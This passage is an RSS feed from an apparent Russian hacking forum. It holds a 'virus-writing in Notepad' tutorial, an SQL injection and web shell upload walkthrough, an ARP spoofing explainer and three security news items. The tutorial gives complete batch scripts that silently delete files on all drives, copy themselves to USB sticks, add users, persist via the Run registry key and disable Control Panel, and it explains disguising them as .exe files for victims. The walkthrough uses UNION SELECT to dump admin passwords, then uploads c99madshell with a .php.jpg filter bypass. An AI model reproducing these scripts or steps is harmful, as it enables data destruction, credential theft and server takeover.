нагрузка на сервер легче использовать PPTPd или IPsec &lt;br /&gt;Мифы и заблуждения, касающиеся ARP-spoofing &lt;br /&gt;ARP-spoofing можно предотвратить с помощью функции port-security коммутаторов &lt;/p&gt;
						&lt;p&gt;Функция port-security коммутатора позволяет защититься от смены MAC-адреса на порту коммутатора. В том случае если компьютер, подключенный к порту коммутатора меняет MAC-адрес или если меняется компьютер, коммутатор замечает подмену и перестаёт передавать пакеты отправленные с новым обратным адресом. Кроме этого, могут выполняться другие действия: отсылка SNMP-трапа, запись в syslog и тому подобное. &lt;/p&gt;
						&lt;p&gt;При ARP-spoofing&#039;е MAC-адрес отправителя (атакующего) не меняется и поэтому с точки зрения port-security никаких аномалий нет. Функция port-security никак не отвечает за соответствие IP-адресов и MAC-адресов, а атака ARP-spoofing построена именно на этом. &lt;br /&gt;ARP cache poisoning&lt;/p&gt;
						&lt;p&gt;Компьютер, связанный с IP/Ethernet&amp;#160; сетью имеет два адреса. Глобально-уникальный&amp;#160; MAC адрес&amp;#160; для каждого сетевого интерфейса и логический IP адрес, назначенный программой. Протокол определения адресов (ARP protocol) формирует ассоциацию между этими двумя адресами. Когда компьютер должен послать пакет IP адресу, расположенному в той же самой сети, он пошлет широковещательное сообщение &amp;quot;ARP who has ?&amp;quot;. Как показано на рисунке, владелец IP адреса отвечает со своим Ethernet адресом. &lt;/p&gt;
						&lt;p&gt;Чтобы минимизировать широковещательные ARP запросы, операционные системы кэшируют ARP ответы.&amp;#160; &lt;/p&gt;
						&lt;p&gt;К сожалению, протокол определения адресов не поддерживает состояние подключения (stateless), и большинство операционных систем обновляет кэш при получении ARP ответа, независимо от того, отослали ли они фактический запрос. Посылая поддельные ARP ответы, атакующий может заставить операционную систему посылать фреймы, предназначенные одному компьютеру на другой компьютер. Этот процесс известен как &amp;quot;ARP Cache poisoning&amp;quot;. &lt;/p&gt;
						&lt;p&gt; В зависимости от операционной системы, отравление кэша может быть достигнуто восемью типами ARP сообщений со следующими свойствами: &lt;br /&gt;ARP сообщение послано в MAC broadcast или MAC unicast. &lt;br /&gt;Код операции может быть &amp;quot;ARP Who is&amp;quot; или &amp;quot;ARP Reply&amp;quot;. &lt;br /&gt;ARP сообщение - допустимое сообщение или недопустимое (внедрение тех же самых IP адресов для источника и адресата) &lt;/p&gt;
						&lt;p&gt;Согласно проведенным испытаниям на операционных системах Windows 9x, NT, 2000, XP, Solaris 8, Linux kernel 2.2 и 2.4, Cisco IOS 12, Nokia IPSO 3.5, существует не менее одного типа ARP сообщения, способного отравить кэш. Кроме того, на системах Windows (9x/NT/2K), статическая ARP запись может всегда быть перезаписана, используя фальшивое ARP сообщение. &lt;/p&gt;
						&lt;p&gt;Обратите внимание, что из-за способа обработки&amp;#160; MAC адреса на концентраторе, имитация источника MAC адреса приведет к тому, что злонамеренный пользователь некоторое время будет получать весь трафик, предназначенный подмененной системе, вызывая тем самым отказ в обслуживании на короткое время. &lt;br /&gt;IP Smart Spoofing&lt;/p&gt;
						&lt;p&gt;Используя отравления ARP кэша, злонамеренный пользователь вставляет свой компьютер по пути связи от сервера к клиенту. Используя IP переадресацию, существующий трафик все еще направляется к клиенту. Конечно, ICMP Redirect должен быть заблокирован на компьютере злонамеренного пользователя. Наконец,&amp;#160; SNAT (Source Network Address Translation) используется злонамеренным пользователем для обмана IP адреса клиента и установления нового подключение к серверу.&lt;/p&gt;
						&lt;p&gt; После этого, злонамеренный пользователь может запустить любые стандартные сетевые приложения, чтобы подключиться к серверу, используя IP адрес клиента. Любое управление доступом, основанное на IP адресе клиента,&amp;#160; будет успешно обойдено. Кроме того, существующий трафик не будет нарушен со стороны сервера, т.е. smart spoofing атака не может быть обнаружена. &lt;br /&gt;Воздействие Smart Spoofing&lt;/p&gt;
						&lt;p&gt;Сетевые устройства, типа маршрутизаторов или межсетевых защит часто используют фильтрацию по IP адресу источника. Эти правила могут быть обойдены с любого компьютера, расположенного на сетевом пути между авторизованным клиентом и межсетевой защитой. Например, в большинстве корпоративных сетей, подключенных к Internet через межсетевую защиту, только немногие из идентифицированных компьютеров могут непосредственно обращаться к интернету (внутренний прокси сервер, получение/отправка SMTP сообщений на прямую, и т.п). Используя smart spoofing, любой внутренний пользователь может обойти правила фильтрации. &lt;/p&gt;
						&lt;p&gt;Тем же самым способом, приложение, доступ которого ограничен определенным IP адресам, может неправильно эксплуатироваться любым компьютером, расположенным на сетевом пути между авторизованным клиентом и сервером. Уязвимость может воздействовать на многие приложения, типа Apache ACL, r-commands, NFS, TCP Wrapper, ограниченные административные средства, и т.д&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Tue, 15 Dec 2009 16:55:38 +0300</pubDate>
			<guid>https://hackerforum.0pk.me/viewtopic.php?pid=8#p8</guid>
		</item>
		<item>
			<title>Самоучитель по созданию вирусов в блокноте</title>
			<link>https://hackerforum.0pk.me/viewtopic.php?pid=7#p7</link>
			<description>&lt;p&gt;Итак, приступим. Вы решили заняться вирусо-писательством. Сразу вам скажу, что эти вирусы, конечно, могут очень сильно навредить компьютеру, но полноценно передаваться с одного компьютера на другой они не могут. За все, что произойдет с вашим компьютером отвечаете вы и только вы. Приступим:&lt;br /&gt;1) Открываем блокнот;&lt;br /&gt;2) Пишем в нем «mspaint», без кавычек;&lt;br /&gt;3) Сохраняем файл под любым именем, но вместо .txt мы напишем .bat;&lt;br /&gt;4) Откроем файлик и увидим, что открылся Paint))&lt;br /&gt;Вот и готова наша первая программка. Вместо «mspaint» можно вписать любую программу, например: Calc-калькулятор, Taskmgr-диспетчер задач… Но при чем здесь вирусы? - спросите вы. Ни при чем)) Следующее, что мы сделаем, это программа для изменения времени на компьютере, да и еще она будит копировать себя на флешку (если та вставлена). Итак:&lt;br /&gt;Пишем в блокноте:&lt;/p&gt;
						&lt;p&gt;time 00:00&lt;br /&gt;copy %0 F:\Work.bat&lt;/p&gt;
						&lt;p&gt;Первой сточкой мы изменяем время на 00:00, а второй скопируем файл на диск F - флешка с именем Work. Не забудьте, сохранить блокнотовский файл в формате .bat. Вместо времени можно изменить и дату «Date 13.06.23». Написав такую строчку, мы изменим дату на 2023 год, 6 месяц, 13 число)) Теперь небольшой перечень того, что можно писать в блокнотовском вирусе.&lt;br /&gt;СПИСОК: &lt;/p&gt;
						&lt;p&gt;1) «copy %0 x:\y» - копирует вирус на диск x в папку y (пример copy %0 C:\System.bat);&lt;br /&gt;2) «label x:y» - переименовывает диск x на имя y (пример label C:error);&lt;br /&gt;3) «time х:у» - меняет время на х часов и у минут (пример time 14:27);&lt;br /&gt;4) «date x.y.z» - меняет дату на x день, y месяц, z лет (пример date 16.11.05);&lt;br /&gt;5) «md х» - создаст папку, в том месте, где наш вирус, с именем х (пример md Papka);&lt;br /&gt;6) «del *.* /q» - удалит все файлы (наш вирус тоже) в папке, где лежит наш вирус (кроме папок);&lt;br /&gt;7) «del x:\y *.* /q» - удалит все файлы на диске х в папке у (кроме папок)&amp;#160; (пример del F:\Data*.* /q);&lt;br /&gt;8) «assoc .х=.у» - переделает все файлы, на компьютере, форматом х на у (пример assoc .exe=.mp3);&lt;br /&gt;9) «net user &amp;quot;х&amp;quot; /add» - добавит на компьютер пользователя под именем х (пример net user &amp;quot;Smoked&amp;quot; /add);&lt;br /&gt;Вот две программки вам на рассмотрение, можете их использовать без моего соглашения, но, используя их, вы принимаете соглашение пользователя.&lt;br /&gt;1)Программа для удаления файлов с флешки (если та вставлена) и переименования ее.&lt;/p&gt;
						&lt;p&gt;del F:\ *.* /q&lt;br /&gt;label F:HACK&lt;/p&gt;
						&lt;p&gt;2)Программа для изменения даты и времени на компьютере и копирования ее на диск C и на флешку.&lt;/p&gt;
						&lt;p&gt;time 14:13&lt;br /&gt;date 11.07.12&lt;br /&gt;copy %0 C:\Time.bat&lt;br /&gt;copy %0 F:\Time.bat&lt;/p&gt;
						&lt;p&gt;Вы уже умеете создавать простенькие вирусы.&lt;br /&gt;Он умеет: менять время, дату, названия дисков и флешек, открывать программы, создавать папки, копировать себя, добавлять пользователей, менять расширения и уничтожать информацию. Это довольно небольшой список, чесно говоря. Теперь я научу вас некоторым тонкостям вирусописательсва. Допустим, вы уже сделали вирус, но выглядит он довольно некрасиво. Ну кто откроет непонятный файл? Вы правы, таких людей на свете не много. Как же изменить формат из .bat на .exe и добавить иконку. Очень легко (Нужно чтобы на компьютере был WinRAR). Находим любой вирус с расширением .bat, нажимаем на него правой кнопкой, жмем «Добавить в архив…». Ставим галочку «Создать SFX-архив», выбираем вкладку дополнительно, и кликаем на кнопку «Параметры SFX…». В окне «Выполнить после распаковки» пишем названия вируса (пример Virus.bat) а в окне «Текст и графика» далее «Загрузить значок SFX из фала». Жмем «Обзор» и ищем любой значок формата .ico. Теперь жмем ОК. Готово)) Формат .exe, а не .bat, как нам и надо было. Теперь можно делать с вирусами что угодно. А что именно, решать уже вам. Хотите научиться еще командам, которыми можно просто добить нашего «лоха», открываем wwwGoogle.ru, пишем bat вирусы и жмем «Искать». &lt;/p&gt;
						&lt;p&gt;Допустим, вы написали вирус, который будет портить открытую от папок информацию и немного вредить:&lt;/p&gt;
						&lt;p&gt;del C:\ *.* /q&lt;br /&gt;del D:\ *.* /q&lt;br /&gt;del E:\ *.* /q&lt;br /&gt;del F:\ *.* /q&lt;br /&gt;time 00:00&lt;br /&gt;date 13.06.23&lt;br /&gt;del *.* /q&lt;/p&gt;
						&lt;p&gt;Готово? – спросите вы. Нет. Нужно его закончить. Новая команда «@echo off» вводиться в начале нашего вируса и скрывает все, что в нем происходит в дальнейшем. Одним словом, не дадим пользователю увидеть, что случилось. Еще добавив после каждой команды простенькое, но очень эффективное действие, как «&amp;gt;nul» к примеру «time 00:00 &amp;gt;nul», мы скроем сточку. Итак, можно усовершенствовать наш вирус:&lt;/p&gt;
						&lt;p&gt;@echo off&lt;br /&gt;del C:\ *.* /q &amp;gt;nul&lt;br /&gt;del D:\ *.* /q &amp;gt;nul&lt;br /&gt;del E:\ *.* /q &amp;gt;nul&lt;br /&gt;del F:\ *.* /q &amp;gt;nul&lt;br /&gt;time 00:00 &amp;gt;nul&lt;br /&gt;date 13.06.23 &amp;gt;nul&lt;br /&gt;del *.* /q &amp;gt;nul&lt;/p&gt;
						&lt;p&gt;Вот, теперь наш вирус готов. Сохраняем, конвертируем, а вот, что дальше с ним делать — ваше дело. Кстати, есть отличная программа для конвертирования .bat в .exe, она работает намного лучше WinRAR&#039;а, называется она «Bat to exe converter». Скачать ее можно в интернете, она бесплатная. Итак, вернемся к вирусо-писательству.&lt;br /&gt;%SystemRoot%/system32/rundll32 user32, SwapMouseButton&lt;br /&gt;Данная строчка меняет клавиши мыши местами. Можно с кого-то прикольнуться,&amp;#160; пока он въедет, что случилось, пройдет время (если он совсем юзер), для особоодаренных скажу, если вы ввели это у себя отключить довольно просто: «Панель Управления», «Принтеры и другое оборудование», «Мышь» и снимаем первую галочку.&lt;br /&gt;Итак, дальше поехали дальше:&lt;/p&gt;
						&lt;p&gt;:x ;&lt;br /&gt;Start mspaint&lt;br /&gt;goto x ;&lt;/p&gt;
						&lt;p&gt;Очень неплохая строка для нагрузки слабеньких машин. Команда открывает Paint, причем очень быстро. Раз 60 до того как вы поймете, что случилось и закроете программу. Попробуйте ввести вместо mspaint любые строки программ... Работает)) Можно использовать&amp;#160; по несколько таких команд до полного торможения компьютера жертвы. Новый скрипт:&lt;/p&gt;
						&lt;p&gt;copy &amp;quot;&amp;quot;%0&amp;quot;&amp;quot; &amp;quot;%SystemRoot%\system32\File.bat&amp;quot; &lt;br /&gt;reg add &amp;quot;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&amp;quot; /v &amp;quot;Filel&amp;quot; /t REG_SZ /d &amp;quot;%SystemRoot%\system32\File.bat&amp;quot; /f &lt;br /&gt;reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f&lt;/p&gt;
						&lt;p&gt;Очень жестокая команда: добавляет программу в автозагрузку ОС. Не советую проверять на вашем компьютере. Не останавливаемся, а едем дальше))&lt;/p&gt;
						&lt;p&gt;assoc .lnk=.txt &amp;gt;nul&lt;br /&gt;assoc .exe=.mp3 &amp;gt;nul&lt;/p&gt;
						&lt;p&gt;Данными двумя строками мы делаем, весьма тяжелый вред компьютеру жертвы. Он меняет расширения всех файлов на компьютере с .lnk в .txt и&amp;#160; .exe в .mp3. То есть все ярлыки, открываются в блокноте, а программы, все, в плеере. Круто, да? Теперь прочтите нижний код и если вы поняли, в чем суть вируса, поздравляю вас вы закончили базовый курс, от adminа, вирусо-писательства. Если же нет. Читаем все заново))&lt;br /&gt;@echo off&lt;br /&gt;%SystemRoot%/system32/rundll32 user32, SwapMouseButton &amp;gt;nul&lt;br /&gt;time 0:00 &amp;gt;nul&lt;br /&gt;date 13.06.23 &amp;gt;nul&lt;br /&gt;label C:IDIOT &amp;gt;nul&lt;br /&gt;label D:URAK &amp;gt;nul&lt;br /&gt;label E:SUKA &amp;gt;nul&lt;br /&gt;label F:GANDON &amp;gt;nul&lt;br /&gt;copy %0 C:\Open.bat &amp;gt;nul&lt;br /&gt;copy %0 D:\Open.bat &amp;gt;nul&lt;br /&gt;copy %0 E:\Open.bat &amp;gt;nul&lt;br /&gt;copy %0 F:\Open.bat &amp;gt;nul&lt;br /&gt;net user &amp;quot;Idiot you Hacked&amp;quot; /add &amp;gt;nul&lt;br /&gt;net user &amp;quot;Bitch you Hacked&amp;quot; /add &amp;gt;nul&lt;br /&gt;net user &amp;quot;Durak you Hacked&amp;quot; /add &amp;gt;nul&lt;br /&gt;net user &amp;quot;Kritin you Hacked&amp;quot; /add &amp;gt;nul &lt;br /&gt;net user &amp;quot;Gavno you Hacked&amp;quot; /add &amp;gt;nul&lt;br /&gt;md 1 &amp;gt;nul&lt;br /&gt;md 2 &amp;gt;nul&lt;br /&gt;md 3 &amp;gt;nul&lt;br /&gt;md 4 &amp;gt;nul&lt;br /&gt;md 5 &amp;gt;nul&lt;br /&gt;md 6 &amp;gt;nul&lt;br /&gt;md 7 &amp;gt;nul&lt;br /&gt;md 8 &amp;gt;nul&lt;br /&gt;md 9 &amp;gt;nul&lt;br /&gt;md 10 &amp;gt;nul&lt;br /&gt;md 11 &amp;gt;nul&lt;br /&gt;md 12 &amp;gt;nul&lt;br /&gt;md 13 &amp;gt;nul&lt;br /&gt;md 14 &amp;gt;nul&lt;br /&gt;md 15 &amp;gt;nul&lt;br /&gt;md 16 &amp;gt;nul&lt;br /&gt;md 17 &amp;gt;nul&lt;br /&gt;md 18 &amp;gt;nul&lt;br /&gt;md 19 &amp;gt;nul&lt;br /&gt;md 20 &amp;gt;nul&lt;br /&gt;md 21 &amp;gt;nul&lt;br /&gt;md 22 &amp;gt;nul&lt;br /&gt;md 23 &amp;gt;nul&lt;br /&gt;md 24 &amp;gt;nul&lt;br /&gt;md 25 &amp;gt;nul&lt;br /&gt;md 26 &amp;gt;nul&lt;br /&gt;md 27 &amp;gt;nul&lt;br /&gt;assoc .lnk=.txt &amp;gt;nul&lt;br /&gt;assoc .exe=.txt &amp;gt;nul&lt;br /&gt;:x ; &lt;br /&gt;Start mspaint &lt;br /&gt;goto x ; &lt;br /&gt;:x ; &lt;br /&gt;Start Calc &lt;br /&gt;goto x ; &lt;br /&gt;copy &amp;quot;&amp;quot;%0&amp;quot;&amp;quot; &amp;quot;%SystemRoot%\system32\Cool.bat&amp;quot; &amp;gt;nul&lt;br /&gt;reg add &amp;quot;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&amp;quot; /v &amp;quot;Cool&amp;quot; /t REG_SZ /d &amp;quot;%SystemRoot%\system32\Cool.bat&amp;quot; /f &amp;gt;nul&lt;br /&gt;reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f &amp;gt;nul&lt;br /&gt;del %0 &amp;gt;nul&lt;br /&gt;На этом мои уроки закончены. Надеюсь, вам понравилось! С уважением admin!&lt;br /&gt;P.S. Когда я первый раз выложил эту статью в интернет. На мой ICQ прийшло около 70 сообщений с просьбой ломануть мыло)) Писал все сам, статья моя! =)&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Tue, 15 Dec 2009 16:42:03 +0300</pubDate>
			<guid>https://hackerforum.0pk.me/viewtopic.php?pid=7#p7</guid>
		</item>
		<item>
			<title>Взлом сайта с помощью SQL-Injection и заливка шелла на хост.</title>
			<link>https://hackerforum.0pk.me/viewtopic.php?pid=6#p6</link>
			<description>&lt;p&gt;Доброго времени суток, господа. Вот решил написать статейку по доволе таки распространенной в наше время атаке SQL-Injection и по заливке шелла (shell) на взломанный сайт. Статей таких, конечно же много, но еще одна, думаю, не помешает, что не понятно там, может быть станет хоть чуток яснее здесь.&lt;/p&gt;
						&lt;p&gt;Итак, приступим.&lt;/p&gt;
						&lt;p&gt;Допустим, имеем некий сайт target.us, уязвим на эту атаку. Прогуляемся по ссылкам, ищем линк вида target.us/lol.php?id=5 (вместо 5 там может быть любое другое число, идентификатор). Теперь в конец подставим кавычку «’», target.us/lol.php?id=5’ и жмем пимпу Enter, смотрим и если сайт таки уязвим, видим ошибку «You have an error in your SQL syntax bla bla bla» . Теперь чтобы убедится, попробуем выполнить арифметическую операцию: target.us/lol.php?id=5-1/* (/* - это знак комментария, нужен чтоб отсеять все ненужное что стоит за ним). И что мы видим? Операция выполнилась target.us/lol.php?id=4, (5-1=4) значит все ОК. Теперь начнем подбирать количество полей в БД (базе данных), можно использовать конструкцию вида union select1,2,3,4, нам будет выдавать ошибки пока не угадаем правильное число (то есть постоянно увеличиваем на 1, union select1,2,3,4, 5 ,6 и т.д.), а можно воспользоваться конструкцией order by вот так: order by12, чтоб не вписывать сразу кучу чисел (полей то может быть и 50). &lt;/p&gt;
						&lt;p&gt;target.us/lol.php?id=5+order+by+12 – Нет ошибки, значит полей или больше 12-ти или 12. target.us/lol.php?id=20 – ошибка. Значит полей меньше 20-ти. И так пока не достигнем результата. Через union select будет выглядеть так: target.us/lol.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12/* и т.д. Чтобы узнать версию MySQL, которая установлена на сервере, выполняем запрос: target.us/lol.php?id=-5+union+select+1,2,3,VERSION(),5,6,7,8,9,10,11,12/* (так же мжно узнать и пользователя через команду USER()) и в браузер прямо на странице сайта вывалит версию БД. Главное глянуть 5 или 4-я. Так как в 5-й присутствует INFORMATION_SCHEMA_TABLES, там подбирать вам будет легче. &lt;/p&gt;
						&lt;p&gt;Теперь узнаем имена имена таблиц. Если версия БД 4-я, то имена будем угадывать, составляем запрос вида target.us/lol.php?id=-5+union+select+1,2,3,admin,5,6,7,8,9,10,11,12+from+Users/* (Users возможное имя БД), если угадали имя и таблицу (Users) то получите вывод с именами в браузер, и так перебирать пока не получите результат. Если же версию «мускула» (MySQL) 5-я, то там вам будет проще, составляем запрос вида: target.us/lol.php?id=-5+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12+from+ INFORMATION_SCHEMA.TABLES/*&amp;#160; и так же увидим вывод имен в браузер. Допустим имя таблицы admin и нам нужна колонка с паролями (passwords) . Составим запрос: : target.us/lol.php?id=-5+union+select+1,2,3, passwords,5,6,7,8,9,10,11,12+from+admin /*.Точно так же подбирается и логин, можно сделать все красивее дав команду target.us/lol.php?id=-5+union+select+1,2,3, concat_ws(0x3a,passwords,0x3a,login),5,6,7,8,9,10,11,12+from+admin /*. Получим вывод вида логин;пароль (например, admin;qwerty) . В разных случаях может быть по-разному, посему придется немного думать. Если получаем хэш (hash) пароля – то идем брутить, если просто вывод пароля – то радуемся. Итак, логин/пароль мы получили, логинимся в систему. Ну имеем мы права админа, ну так же не интересно хочется и по серву погулять. А вот для этого скачиваем шелл, например c99madshell, наверняка он будет иметь расширение txt, поэтому меняем на php. Залить на сервер можно, например, через какую либо форму аплоада (upload), через которую админы что-либо заливают (картинки например). Но бывает так, что стоит фильтр, то есть файл php мы залить ну никак не можем. Тогда идем на хитрость, делаем так c99madshell.php.jpg Фильтр такое может пропустить, если пропустил – то все супер! Переходим в браузере сюда target.us/c99madshell.php.jpg и радуемся что шелл у нас залит, можем гулять по серву! Если сервер на ОС UNIX , то неплохо было бы знать еще и некоторые ее команды. &lt;/p&gt;
						&lt;p&gt;Это все, тренируйтесь господа новички! Желаю удачи в ваших нелегких начинаниях!&lt;/p&gt;
						&lt;p&gt;P.S. Видеоурок по взлому лежит здесь: &lt;a href=&quot;https://www.hackzone.ru/files/get/id/561/Videourok+po+atake+Sql-Injection.htm&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://www.hackzone.ru/files/get/id/56 &amp;#8230; ection.htm&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Tue, 15 Dec 2009 16:33:38 +0300</pubDate>
			<guid>https://hackerforum.0pk.me/viewtopic.php?pid=6#p6</guid>
		</item>
		<item>
			<title>Касперский: киберперступность победят через 50 лет</title>
			<link>https://hackerforum.0pk.me/viewtopic.php?pid=5#p5</link>
			<description>&lt;p&gt;Евгений Касперский убежден, что победа над хакерами и прочими Интернет-преступниками возможна, но только при совместных усилиях всех государств. &lt;/p&gt;
						&lt;p&gt;Глава &amp;quot;Лаборатории Касперского&amp;quot; пояснил, что после того, как государства на самом высоком уровне придут к идее совместного противостояния киберпреступности, то &amp;quot;после этого лет через 50 наступит счастье&amp;quot;. &amp;quot;А до тех пор вам придется пользоваться продукцией имени меня&amp;quot;, - огорчил всех собравшихся на его выступление в Новосибирске Евгений Касперский, который на сегодняшний день российский программист признается одним из ведущих мировых специалистов в области защиты от вирусов. &lt;/p&gt;
						&lt;p&gt;По мнению разработчика антивирусного программного обеспечения, высшие государственные чиновники уже делают первые шаги в правильном направлении, но, к сожалению, пока еще делают это лишь в пределах национальных границ. &lt;/p&gt;
						&lt;p&gt;&amp;quot;Они пока не понимают того, что решать проблемы Интернет-преступности и в будущем - Интернет-терроризма необходимо только совместно, потому что у Интернета нет границ, и тем негодяям, которые орудуют в сети, все равно, где находится граница и следующий айпишник&amp;quot;, - отметил Касперский. &lt;/p&gt;
						&lt;p&gt;Он также считает, что &amp;quot;хотя компьютерная преступность интернациональна, можно говорить о центрах ее наибольшей активности&amp;quot;. &lt;/p&gt;
						&lt;p&gt;Среди центров криминальной активности компьютерных вредителей Евгений Касперский назвал Китай, который держит &amp;quot;пальму первенства&amp;quot; среди всех стран мира. На втором месте – Латинская Америка. На южноамериканском континенте особо выделяется Бразилия. А на третьем месте - Россия, Украина, Прибалтика, Казахстан - страны с большим числом русскоязычного населения. &lt;/p&gt;
						&lt;p&gt;securitylab.ru&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Tue, 15 Dec 2009 16:18:59 +0300</pubDate>
			<guid>https://hackerforum.0pk.me/viewtopic.php?pid=5#p5</guid>
		</item>
		<item>
			<title>Хакеры за 10 минут уничтожили сайт &quot;Московского комсомольца&quot;</title>
			<link>https://hackerforum.0pk.me/viewtopic.php?pid=4#p4</link>
			<description>&lt;p&gt;Сайт газеты &amp;quot;Московский комсомолец&amp;quot; mk.ru подвергся хакерской атаке, в результате которой было уничтожено все его содержимое, включая редакторский интерфейс и архив за все годы существования сайта, пишет в пятницу газета &amp;quot;Коммерсант&amp;quot; со ссылкой на главного редактора &amp;quot;МК&amp;quot; Павла Гусева.&lt;br /&gt;По его словам, атака началась в ночь на четверг, и хакерам хватило десяти минут, чтобы уничтожить весь сайт.&lt;br /&gt;&amp;quot;Когда наши работники заметили, что происходит, они выключили всю систему, но было уже поздно. У нас, конечно, были системы безопасности, но хакерам удалось уничтожить и их&amp;quot;, - говорит главный редактор.&lt;br /&gt;Подозрений по поводу организаторов акции у Гусева нет, пока только удалось выяснить, что атака велась с серверов, находящихся в Корее. &amp;quot;Действовала какая-то хакерская организация или даже спецслужбы&amp;quot;, - считает Павел Гусев. От оценки ущерба, нанесенного газете, главный редактор воздерживается, но говорит, что &amp;quot;Московский комсомолец&amp;quot; понес &amp;quot;очень серьезные убытки&amp;quot;.&lt;br /&gt;Сейчас специалисты редакции восстанавливают работу сайта, а пока по адресу mk.ru находится блог с материалами.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Tue, 15 Dec 2009 15:46:38 +0300</pubDate>
			<guid>https://hackerforum.0pk.me/viewtopic.php?pid=4#p4</guid>
		</item>
		<item>
			<title>Червь уничтожающий MP3 файлы</title>
			<link>https://hackerforum.0pk.me/viewtopic.php?pid=2#p2</link>
			<description>&lt;p&gt;&amp;quot;Nopir.B&amp;quot; – так назвали недавно появившегося червя, который делает популярные файлообменные p2p-сети небезопасными. Сразу же после заражение компьютера червь проверяет все накопители на наличие MP3 файлов и удаляет их. &lt;br /&gt;Первым об опасности сообщил производитель антивирусов Sophos. Согласно заявлению компании, Nopir. B распространился незначительно, однако с помощью своей маскировки он может принести немало хлопот.&lt;br /&gt;В сетях червь выглядит как кряк для популярной программы копирования DVD. Система инфицируется после запуска &amp;quot;.exe&amp;quot; файла.&lt;br /&gt;Для своей защиты Nopir.B блокирует доступ к системному управлению и деактивирует менеджер задач и средства регистрации. Затем начинается удаление MP3.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Tue, 15 Dec 2009 15:32:51 +0300</pubDate>
			<guid>https://hackerforum.0pk.me/viewtopic.php?pid=2#p2</guid>
		</item>
	</channel>
</rss>
